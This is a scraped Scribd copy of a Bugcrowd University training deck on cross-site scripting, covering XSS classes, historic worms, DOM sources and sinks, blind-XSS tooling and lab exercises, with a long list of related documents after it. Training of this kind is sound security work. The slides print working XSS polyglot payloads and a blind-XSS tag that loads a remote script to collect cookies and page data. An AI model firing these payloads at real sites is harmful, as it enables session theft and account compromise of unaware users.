Bugcrowd University - Cross Site Scripting

This document provides an overview of a training module on cross-site scripting (XSS). The module includes readings on XSS, an introduction to XSS and its different classes, examples of classic XSS attacks, best practices, advances in XSS including DOM-based XSS and polyglots, tools for XSS testing, labs for hands-on practice, and references. The module is intended to educate users on XSS vulnerabilities and techniques.

Uploaded by

anon_929798114

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

103 views

Bugcrowd University - Cross Site Scripting

Uploaded by

anon_929798114

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 29

Cross Site Scripting

Bugcrowd University
Module Trainer

● JP Villanueva - @swagnetow
● Trust & Security Engineer @Bugcrowd
● Programmer, hacker, speaker, gamer!
Module Outline

1. Module Reading
2. Introduction to XSS
3. Classic Examples of XSS
4. Best Practices
5. Advances in XSS
6. Tools
7. Labs
8. Resources and References
Module Reading
● Web Application Hacker’s Handbook (2nd Edition)
○ Chapter 12 - Attacking Users: Cross-Site Scripting
● OWASP Testing Guide 4.0
○ 4.8.1 Testing for Reflected Cross Site Scripting
(OTG-INPVAL-001)
○ 4.8.2 Testing for Stored Cross Site Scripting (OTG-INPVAL-002)
○ 4.12.1 Testing for DOM based Cross Site Scripting
(OTG-CLIENT-001)
● Mozilla Developer Network - Web Docs
○ Introduction to the DOM
Introduction
Introduction to Cross Site Scripting

● History
● What is it?
● When/Where do you find it?
● How do you find it
● How impactful is this?
● What can you do with XSS?
Classes of XSS
Classes of XSS

● Reflective XSS
● Stored XSS
● DOM XSS
● Blind XSS
● Flash-based XSS
● Self XSS
Classic Examples of XSS
Myspace Worm - Stored XSS

● https://samy.pl/popular/tech.html
Tweetdeck Worm - Stored XSS

● https://threatpost.com/tweetdeck-taken-down-in-wake-of-xss-attacks/106597/
Best Practices
Best Practices Injections
“
“>
● Start slow! “><>
● Don’t get discouraged! “><script>
“></script>
● Keep a list of common payloads “><script>alert(1)</script>
“><script>confirm(1)</script>
● Use Burp Intruder ...
Advances in XSS
Advances in XSS

● DOM XSS
● XSS Polyglots
● Blind XSS
DOM XSS - What to Look For?

Sources: Sinks:
document.url element.innerHTML()
document.referrer element.outerHTML()
location eval()
location.href setTimeout()
location.search setInterval()
location.hash document.write()
location.pathname document.writeln()
DOM XSS - What Does It Look Like?
XSS Polyglot #1 (RSnake)

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,
83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar
Code(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(
88,83,83))</SCRIPT>

Multi-context, filter bypass based polyglot payload #1 (OWASP XSS Cheat Sheet)
XSS Polyglot #2 (0xsobky)

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/
--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

● https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
XSS Polyglot #3 (Ashar Javed)

'">><marquee><img src=x
onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse
over=prompt(1)><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/)
type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&
lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img
src="http://i.imgur.com/P8mL8.jpg">

● Multi-context, filter bypass based polyglot payload #2 (Ashar Javed XSS Research)
Blind XSS
G
BU

1 Jamie: I really
enjoy my super
Frans: I really admin access
enjoy my NEW this morning !!!
super admin
access this
morning !!! “><script src=//y.vg></script> 2
4

l !!#!
vascript shel
Y.vg is a a ja

3
Tooling
Tooling

● Blind XSS
○ XSS Hunter
○ Sleepy Puppy
○ KnoXSS
XSSHunter (Blind)

Payload:

● The vulnerable page's URI

● Origin of Execution
● The Victim's IP Address
● The Page Referer
● The Victim's User Agent
● All Non-HTTP-Only Cookies
● The Page's Full HTML DOM
● Full Screenshot of the
Affected Page
● Responsible HTTP Request
(If an XSS Hunter compatible
tool is used)

Nods to BeeF & XSShell

Other Blind XSS Frameworks

u p p or t
SMS S
Jackmasa’s XSS
Mindmap

https://github.com/jhaddix/XSS.png
Labs
Labs
bWapp Section - A3 - Cross-Site Scripting (XSS)

Cross-Site Scripting - Reflected (GET)

Cross-Site Scripting - Reflected (POST)
Cross-Site Scripting - Reflected (JSON)
Cross-Site Scripting - Reflected (AJAX/JSON)
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)
Cross-Site Scripting - Reflected (HREF)
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)
Additional Labs
Pentesterlab
● XSS and MYSQL FILE
● Web for Pentester
● Web for Pentester II

Course Presentation
No ratings yet
Course Presentation
43 pages
Cooledit 1.2. Manual
No ratings yet
Cooledit 1.2. Manual
225 pages
Office 365 Exchange Online Project Plan Template
No ratings yet
Office 365 Exchange Online Project Plan Template
3 pages
Advanced XSS 1700217269
No ratings yet
Advanced XSS 1700217269
45 pages
NoScript InjectionChecker
No ratings yet
NoScript InjectionChecker
48 pages
Cross-Site Scripting: Analysis, Identification and Exploitation
No ratings yet
Cross-Site Scripting: Analysis, Identification and Exploitation
28 pages
Scriptlar
No ratings yet
Scriptlar
53 pages
The Innerhtml Apocalypse: How Mxss Attacks Change Everything We Believed To Know So Far
No ratings yet
The Innerhtml Apocalypse: How Mxss Attacks Change Everything We Believed To Know So Far
51 pages
Udemy - Web Pentesting Course Slides
No ratings yet
Udemy - Web Pentesting Course Slides
103 pages
The Bug Hunters Methodology
No ratings yet
The Bug Hunters Methodology
79 pages
For The Win!: @brutelogic
No ratings yet
For The Win!: @brutelogic
43 pages
Advanced XSS
No ratings yet
Advanced XSS
57 pages
OWASPLondon20161124 JSON Hijacking Gareth Heyes
No ratings yet
OWASPLondon20161124 JSON Hijacking Gareth Heyes
44 pages
How Do I Shot Web
No ratings yet
How Do I Shot Web
82 pages
Advanced Cross Site Scripting: and CSRF
No ratings yet
Advanced Cross Site Scripting: and CSRF
42 pages
Hunting Vulnerabilities: Asynchronous
No ratings yet
Hunting Vulnerabilities: Asynchronous
32 pages
XSS - Advanced techniques.pptx
No ratings yet
XSS - Advanced techniques.pptx
30 pages
2 Vorontsov XXE
No ratings yet
2 Vorontsov XXE
14 pages
XSS-Tips N Tricks
No ratings yet
XSS-Tips N Tricks
19 pages
Xss - Cross-Site Scripting
No ratings yet
Xss - Cross-Site Scripting
43 pages
xss introduction
No ratings yet
xss introduction
9 pages
XSS Payloads
No ratings yet
XSS Payloads
21 pages
CSCI6268L17
No ratings yet
CSCI6268L17
17 pages
[CyberSec'24] Lab05 - Student Version
No ratings yet
[CyberSec'24] Lab05 - Student Version
29 pages
Breaking XSS Mitigations Via Script Gadgets BHUSA
No ratings yet
Breaking XSS Mitigations Via Script Gadgets BHUSA
50 pages
UNIT 3
No ratings yet
UNIT 3
118 pages
Unraveling Some of The Mysteries Around DOM-based XSS
100% (1)
Unraveling Some of The Mysteries Around DOM-based XSS
36 pages
Cross-site Scripting (XSS)
No ratings yet
Cross-site Scripting (XSS)
8 pages
WP Cross Site Scripting
No ratings yet
WP Cross Site Scripting
12 pages
XSS_Payload_Examples
No ratings yet
XSS_Payload_Examples
7 pages
Lab 3 Web Attacks: XSS, XSRF, SQL Injection
0% (1)
Lab 3 Web Attacks: XSS, XSRF, SQL Injection
11 pages
Unraveling Some Mysteries Around DOM-based XSS
No ratings yet
Unraveling Some Mysteries Around DOM-based XSS
42 pages
Tech Talks 52 Good To The Last Drop Writing Robust Flask and Django Apps
No ratings yet
Tech Talks 52 Good To The Last Drop Writing Robust Flask and Django Apps
49 pages
Ch 006
No ratings yet
Ch 006
32 pages
4 XSS
No ratings yet
4 XSS
17 pages
serie11
No ratings yet
serie11
3 pages
Unit 2 PPT WT
No ratings yet
Unit 2 PPT WT
155 pages
Javascript: The Scripting Language of The Web!
No ratings yet
Javascript: The Scripting Language of The Web!
9 pages
Exact Basics of Hacking Intro: Description
No ratings yet
Exact Basics of Hacking Intro: Description
6 pages
DOM Based XSS and Proper Output Encoding
100% (1)
DOM Based XSS and Proper Output Encoding
35 pages
100+ Termux Tools
No ratings yet
100+ Termux Tools
13 pages
XSS Portswigger: Normal XSS (Re Ected or Stored XSS) How It Works
No ratings yet
XSS Portswigger: Normal XSS (Re Ected or Stored XSS) How It Works
1 page
XML Based Attacks: Daniel Tomescu
No ratings yet
XML Based Attacks: Daniel Tomescu
25 pages
Web App Security 1193579768112939 1
No ratings yet
Web App Security 1193579768112939 1
83 pages
Java Script
100% (1)
Java Script
80 pages
ACS
No ratings yet
ACS
21 pages
A Simple Guide To Cross Site Scripting
No ratings yet
A Simple Guide To Cross Site Scripting
20 pages
XSS Answers
No ratings yet
XSS Answers
7 pages
EN - Hack In Bo - So we broke all CSPs
No ratings yet
EN - Hack In Bo - So we broke all CSPs
47 pages
Xss Payloads
No ratings yet
Xss Payloads
17 pages
Complete Cross Site Scripting Walkthrough
No ratings yet
Complete Cross Site Scripting Walkthrough
23 pages
Javascript Introduction
No ratings yet
Javascript Introduction
6 pages
Ez220 Source Code
No ratings yet
Ez220 Source Code
8 pages
7.2 - Web Application Security Threats
No ratings yet
7.2 - Web Application Security Threats
81 pages
JSP Vulnerabilities and Fixes For Developers
No ratings yet
JSP Vulnerabilities and Fixes For Developers
6 pages
options/exposed - To - Client - JS? 1464354000
No ratings yet
options/exposed - To - Client - JS? 1464354000
17 pages
Done by Alibek Sabraliyev and Yerezhepov Askhat CSSE-0902
No ratings yet
Done by Alibek Sabraliyev and Yerezhepov Askhat CSSE-0902
10 pages
Same Markup: Core Guidelines: Feature Detection Behavior Detection
No ratings yet
Same Markup: Core Guidelines: Feature Detection Behavior Detection
7 pages
Cross Domain Attacks - Implication
No ratings yet
Cross Domain Attacks - Implication
31 pages
Testing Node Security
No ratings yet
Testing Node Security
43 pages
PHP v. Java
No ratings yet
PHP v. Java
22 pages
Introduction to Web Hacking: Cross-site Scripting
From Everand
Introduction to Web Hacking: Cross-site Scripting
Gary Drocella
No ratings yet
As PDF Best of DETAIL Facades by DETAIL - Issuu
No ratings yet
As PDF Best of DETAIL Facades by DETAIL - Issuu
71 pages
(USD) gloCOM Reseller
No ratings yet
(USD) gloCOM Reseller
2 pages
Sample PDF Document Files
No ratings yet
Sample PDF Document Files
3 pages
2020 - Roadroid University Registration Form
No ratings yet
2020 - Roadroid University Registration Form
2 pages
CTRLX Configurator
No ratings yet
CTRLX Configurator
1 page
Question 1: What Is The "Lite" Version of XAMPP?
No ratings yet
Question 1: What Is The "Lite" Version of XAMPP?
2 pages
Weekly Billing Statement - CSV and XML: MSRS Report Format Documentation
No ratings yet
Weekly Billing Statement - CSV and XML: MSRS Report Format Documentation
7 pages
User Hook Summary PDF
No ratings yet
User Hook Summary PDF
4 pages
PE84W14B-C: Before Operating The Unit, Please Read This Manual Thoroughly and Retain It For Future Reference
No ratings yet
PE84W14B-C: Before Operating The Unit, Please Read This Manual Thoroughly and Retain It For Future Reference
32 pages
List Tutorial
No ratings yet
List Tutorial
3 pages
Ldrp Institute of Technology and Research
No ratings yet
Ldrp Institute of Technology and Research
12 pages
FAQ SINAMICS G Firmwarestnde V4.7 SP10 HF5
No ratings yet
FAQ SINAMICS G Firmwarestnde V4.7 SP10 HF5
4 pages
What Impact Does File Format, Compression Techniques, Image Resolution and Colour Depth Have On File Size and Image Quality?
No ratings yet
What Impact Does File Format, Compression Techniques, Image Resolution and Colour Depth Have On File Size and Image Quality?
6 pages
Assignment 2
50% (2)
Assignment 2
14 pages
K. K. Wagh Polytechnic, Nashik: Micro-Project Report
No ratings yet
K. K. Wagh Polytechnic, Nashik: Micro-Project Report
7 pages
Tech Disaster Recovery
No ratings yet
Tech Disaster Recovery
7 pages
PK Sinha Distributed Operating System PDF
0% (1)
PK Sinha Distributed Operating System PDF
4 pages
Exam Questions AZ-103
No ratings yet
Exam Questions AZ-103
74 pages
GGK Gang - Google Search
No ratings yet
GGK Gang - Google Search
2 pages
Page 98 Vocabulary
No ratings yet
Page 98 Vocabulary
7 pages
Manual: Tools For Korg Workstations PCG and Related Files
No ratings yet
Manual: Tools For Korg Workstations PCG and Related Files
176 pages
Kursus Pendedahan Program Linus 2.0 (Literasi Bahasa Inggeris) Tahun 2 Kepada Jurulatih Utama TAHUN 2013 Kementerian Pelajaran Malaysia
No ratings yet
Kursus Pendedahan Program Linus 2.0 (Literasi Bahasa Inggeris) Tahun 2 Kepada Jurulatih Utama TAHUN 2013 Kementerian Pelajaran Malaysia
33 pages
(CTS +) Finally in SAP Cloud Platform - IS! - SAP Blogs
No ratings yet
(CTS +) Finally in SAP Cloud Platform - IS! - SAP Blogs
9 pages
Windows XP Professional SP3 x86 - Microsoft - Free Download, Borrow, and Streaming - Internet Archive
No ratings yet
Windows XP Professional SP3 x86 - Microsoft - Free Download, Borrow, and Streaming - Internet Archive
16 pages
Jenko Hwong - New Phishing Attacks Exploiting OAuth Authentication Flows
No ratings yet
Jenko Hwong - New Phishing Attacks Exploiting OAuth Authentication Flows
42 pages
Installation of Wintestem Under Windows 10: 1. Issue
No ratings yet
Installation of Wintestem Under Windows 10: 1. Issue
4 pages
How To Become A Software Tester-A Step-By-Step Guide - SDA Blog
100% (1)
How To Become A Software Tester-A Step-By-Step Guide - SDA Blog
4 pages
Zephyr Enterprise Tutorial
No ratings yet
Zephyr Enterprise Tutorial
18 pages